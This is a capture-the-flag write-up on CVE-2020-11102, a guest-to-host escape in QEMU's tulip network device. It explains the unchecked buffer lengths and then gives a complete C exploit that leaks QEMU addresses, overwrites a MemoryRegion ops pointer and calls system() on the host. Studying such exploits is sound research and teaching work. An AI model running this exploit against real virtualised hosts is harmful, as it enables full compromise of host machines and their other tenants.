CVE-2020-11102: Escape from the Earth
Introduction
I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, which is a vulnerability in qemu that allows guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some detail about the challenge and what I learned from it.
The vulnerability
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 static void tulip_copy_tx_buffers (TULIPState *s, struct tulip_descriptor *desc) { int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK; int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK; if (len1) { pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); s->tx_frame_len += len1; } if (len2) { pci_dma_read(&s->dev, desc->buf_addr2, s->tx_frame + s->tx_frame_len, len2); s->tx_frame_len += len2; } desc->status = (len1 + len2) ? 0 : 0x7fffffff ; }
Take a look at tulip_copy_tx_buffers()
first. It copies the desc->buf_addr1
to the tx_frame + s->tx_frame_len
. Notice that there is no check for the s->tx_frame_len
as well as the len1
. And s->tx_frame_len
will be increased by len1
after copying. When we call this function multiple times, the s->tx_frame_len
can be increased to a very large value, which can cause a buffer overflow.
The same applies to tulip_copy_rx_bytes()
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 static void tulip_copy_rx_bytes (TULIPState *s, struct tulip_descriptor *desc) { int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK; int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK; int len; if (s->rx_frame_len && len1) { if (s->rx_frame_len > len1) { len = len1; } else { len = s->rx_frame_len; } pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len); s->rx_frame_len -= len; } if (s->rx_frame_len && len2) { if (s->rx_frame_len > len2) { len = len2; } else { len = s->rx_frame_len; } pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame + (s->rx_frame_size - s->rx_frame_len), len); s->rx_frame_len -= len; } }
The tulip_copy_rx_bytes()
function copies the s->rx_frame
to the desc->buf_addr1
. And there is no check for the s->rx_frame_len
and s->rx_frame_size
. This results in possible memory disclosure.
Exploitation
Leak something first
To leak QEMU base address and heap address we need to control s->rx_frame_size
and s->rx_frame_len
. Consider the following code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 typedef struct TULIPState { PCIDevice dev; MemoryRegion io; MemoryRegion memory; NICConf c; qemu_irq irq; NICState *nic; eeprom_t *eeprom; uint32_t csr[16 ]; uint32_t old_csr9; uint32_t mii_word; uint32_t mii_bitcnt; hwaddr current_rx_desc; hwaddr current_tx_desc; uint8_t rx_frame[2048 ]; uint8_t tx_frame[2048 ]; int tx_frame_len; int rx_frame_len; int rx_frame_size; uint32_t rx_status; uint8_t filter[16 ][6 ]; } TULIPState;
The tx_frame
is a fixed size buffer, which is 2048 bytes. By triggering tulip_copy_tx_buffers()
multiple times, we can control tx_frame_len
, rx_frame_len
and rx_frame_size
. Then we can call tulip_copy_rx_bytes()
and copy the heap memory back to the user space of the guest OS. With some calculation, we can retrieve the QEMU base address and heap address very easily.
After leaking the memory, we need to figure out how to get arbitrary code exection within the context of QEMU. This piece of code caught my attention:
1 2 3 4 5 6 7 8 9 static const MemoryRegionOps tulip_ops = { .read = tulip_read, .write = tulip_write, .endianness = DEVICE_LITTLE_ENDIAN, .impl = { .min_access_size = 4 , .max_access_size = 4 , }, };
What if we can control the function pointer in tulip_ops
? Unfortunately, the tulip_ops
is not writable.
When initializing the memory region of TULIPState
, the pointer to tulip_ops
will be assigned to struct MemoryRegion.ops
.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s, "tulip-io" , 128 ); memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s, "tulip-mem" , 128 ); struct MemoryRegion { Object parent_obj; bool romd_mode; bool ram; bool subpage; bool readonly; bool nonvolatile; bool rom_device; bool flush_coalesced_mmio; bool global_locking; uint8_t dirty_log_mask; bool is_iommu; RAMBlock *ram_block; Object *owner; const MemoryRegionOps *ops; void *opaque; MemoryRegion *container; Int128 size; hwaddr addr; void (*destructor)(MemoryRegion *mr); uint64_t align; bool terminates; bool ram_device; bool enabled; bool warning_printed; uint8_t vga_logging_count; MemoryRegion *alias; hwaddr alias_offset; int32_t priority; QTAILQ_HEAD(, MemoryRegion) subregions; QTAILQ_ENTRY(MemoryRegion) subregions_link; QTAILQ_HEAD(, CoalescedMemoryRange) coalesced; const char *name; unsigned ioeventfd_nb; MemoryRegionIoeventfd *ioeventfds; };
And struct MemoryRegion
is allocated on the heap. So we can overwrite the struct MemoryRegion.ops
with the address of tx_frame
and craft a fake struct MemoryRegionOps
.
Also, notice that the type of tx_frame_len
, rx_frame_len
and rx_frame_size
are all int
, which means we can write backward if we overwrite these fields with negative value.
Exploitation
The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 #include <stdio.h> #include <string.h> #include <stdint.h> #include <stdlib.h> #include <fcntl.h> #include <assert.h> #include <inttypes.h> #include <sys/io.h> #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) #define PMIO_BASE 0x000000000000c000 #define CSR(_x) ((_x) << 3) #define CSR5_TS_SUSPENDED 6 #if 0 tulip_write -> tulip_xmit_list_update -> tulip_copy_tx_buffers -> pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); -> static uint32_t tulip_ts (TULIPState *s) { return (s->csr[5 ] >> CSR5_TS_SHIFT) & CSR5_TS_MASK; } #endif struct tulip_descriptor { uint32_t status; uint32_t control; uint32_t buf_addr1; uint32_t buf_addr2; }; int fd;uint32_t page_offset (uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1 ); } uint64_t gva_to_gfn (void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t )addr >> 9 ) & ~7 ; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8 ); if (!(pme & PFN_PRESENT)) return -1 ; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa (void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1 ); return (gfn << PAGE_SHIFT) | page_offset((uint64_t )addr); } uint64_t pmio_read (uint64_t port) { uint64_t val; val = inw(PMIO_BASE + port); return val; } void pmio_write (uint64_t port, uint64_t val) { outw(val, PMIO_BASE + port); } void pmio_writel (uint64_t port, uint64_t val) { outl(val, PMIO_BASE + port); } int main (int argc, char **argv) { printf ("[*] enter stage1\n" ); int ret = 0 ; fd = open("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) { perror("open" ); exit (1 ); } iopl(3 ); struct tulip_descriptor *tx_desc = malloc (sizeof (struct tulip_descriptor)); struct tulip_descriptor *rx_desc = malloc (sizeof (struct tulip_descriptor)); char *recv_buf = malloc (0x9000 ); char *buf = malloc (0x1000 ); memset (buf, 'A' , 0x1000 ); memset (recv_buf, 'B' , 0x9000 ); int len1 = 0x400 << 0 ; int len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); struct oob_data { int tx_frame_len; int rx_frame_len; int rx_frame_size; uint32_t rx_status; uint8_t filter[16 ][6 ]; }; len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = 0x400 - len1; oob_data->rx_frame_len = 0x900 ; oob_data->rx_frame_size = 2048 *2 + 0x900 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 'A' ; oob_data->filter[i][1 ] = 'A' ; oob_data->filter[i][2 ] = 'A' ; oob_data->filter[i][3 ] = 'A' ; oob_data->filter[i][4 ] = 'A' ; oob_data->filter[i][5 ] = 'A' ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ) | (1UL << 30 ); pmio_write(CSR(6 ), 0x800 | (1u << 13 ) | (1UL << 1 )); sleep(1 ); printf ("[*] OOB write tx_frame_len...\n" ); int rx_len1, rx_len2; rx_len1 = 0x400 ; rx_len2 = 0 ; rx_desc->status = (1UL << 31 ) | (1UL << 24 ); rx_desc->buf_addr1 = gva_to_gpa(recv_buf); rx_desc->buf_addr2 = 0x180 ; rx_desc->control = rx_len2 | rx_len1 | (1UL << 24 ) | (1UL << 30 ); sleep(1 ); uint64_t rx_desc_gpa = gva_to_gpa(rx_desc); printf ("[*] rx_desc_gpa: 0x%lx\n" , rx_desc_gpa); pmio_writel(CSR(3 ), rx_desc_gpa); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[+] leak\n" ); char *cur = (char *)recv_buf; for (int i = 0 ; i < 50 ; ++i) { printf ("0x%016lx 0x%016lx\n" , *(size_t *)cur, *(size_t *)(cur+8 )); cur += 16 ; } cur = (char *)recv_buf; uint64_t qemu_base = ((uint64_t *)cur)[0x1d ] - 0x755f9f ; uint64_t heap_base = ((uint64_t *)cur)[22 ] - 0xe11380 ; uint64_t qemu_plt_system = qemu_base+2859620 ; uint64_t frame_base = heap_base+0xe0fcf0 ; printf ("[*] continue...\n" ); printf ("[+] qemu_base: 0x%lx\n" , qemu_base); printf ("[+] heap_base: 0x%lx\n" , heap_base); printf ("[*] enter stage2\n" ); { len1 = 0x400 << 0 ; len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = -0x3350 - 0x70 ; oob_data->rx_frame_len = 0 ; oob_data->rx_frame_size = 0 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 0xff ; oob_data->filter[i][1 ] = 0xff ; oob_data->filter[i][2 ] = 0xff ; oob_data->filter[i][3 ] = 0xff ; oob_data->filter[i][4 ] = 0xff ; oob_data->filter[i][5 ] = 0xff ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_write(CSR(6 ), 0x800 | (1u << 13 ) | (1UL << 1 )); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); sleep(1 ); uint64_t *binsh = (uint64_t *)malloc (0x200 ); binsh[0 ] = 7449354444534473059 ; binsh[1 ] = 0 ; len1 = 16 ; len2 = 0 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(binsh); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_writel(CSR(4 ), tx_desc_gpa); } printf ("[*] enter stage3\n" ); { ((uint64_t *)buf)[0 ] = qemu_plt_system; ((uint64_t *)buf)[1 ] = qemu_plt_system; ((uint64_t *)buf)[2 ] = 0 ; ((uint64_t *)buf)[3 ] = 0 ; ((uint64_t *)buf)[4 ] = 2 ; ((uint64_t *)buf)[5 ] = 0 ; ((uint64_t *)buf)[6 ] = 0 ; ((uint64_t *)buf)[7 ] = 0 ; ((uint64_t *)buf)[8 ] = 0x0000000400000004 ; ((uint64_t *)buf)[9 ] = 0 ; ((uint64_t *)buf)[10 ] = 0 ; ((uint64_t *)buf)[11 ] = 0 ; len1 = 0x400 << 0 ; len2 = 0 << 11 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 29 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; printf ("[*] desc: 0x%x\n" , tx_desc->buf_addr1); uint64_t tx_desc_gpa = gva_to_gpa(tx_desc); printf ("[*] tx_desc_gpa: 0x%lx\n" , tx_desc_gpa); pmio_writel(CSR(6 ), 1u << 13 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] fill tx_frame\n" ); sleep(1 ); tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->control = len2 | len1 | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(buf); tx_desc->buf_addr2 = 0x180 ; pmio_writel(CSR(4 ), tx_desc_gpa); printf ("[*] clean CSR5\n" ); pmio_writel(CSR(5 ), 0xffffffff ); len1 = sizeof (struct oob_data); struct oob_data *oob_data = malloc (sizeof (struct oob_data)); oob_data->tx_frame_len = -0x2a28 -0x70 ; oob_data->rx_frame_len = 0 ; oob_data->rx_frame_size = 0 ; for (int i = 0 ; i < 16 ; i++) { oob_data->filter[i][0 ] = 0xff ; oob_data->filter[i][1 ] = 0xff ; oob_data->filter[i][2 ] = 0xff ; oob_data->filter[i][3 ] = 0xff ; oob_data->filter[i][4 ] = 0xff ; oob_data->filter[i][5 ] = 0xff ; } tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(oob_data); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); sleep(1 ); pmio_writel(CSR(4 ), tx_desc_gpa); sleep(1 ); printf ("[*] hijack ops\n" ); uint64_t *fake_memory_region_ops = (uint64_t *)malloc (0x200 ); fake_memory_region_ops[0 ] = frame_base; len1 = 8 ; len2 = 0 ; tx_desc->status = (1UL << 31 ) | (1UL << 24 ); tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops); tx_desc->buf_addr2 = 0x180 ; tx_desc->control = len2 | len1 | (1UL << 24 ); pmio_writel(CSR(4 ), tx_desc_gpa); pmio_writel(CSR(4 ), tx_desc_gpa); } return 0 ; }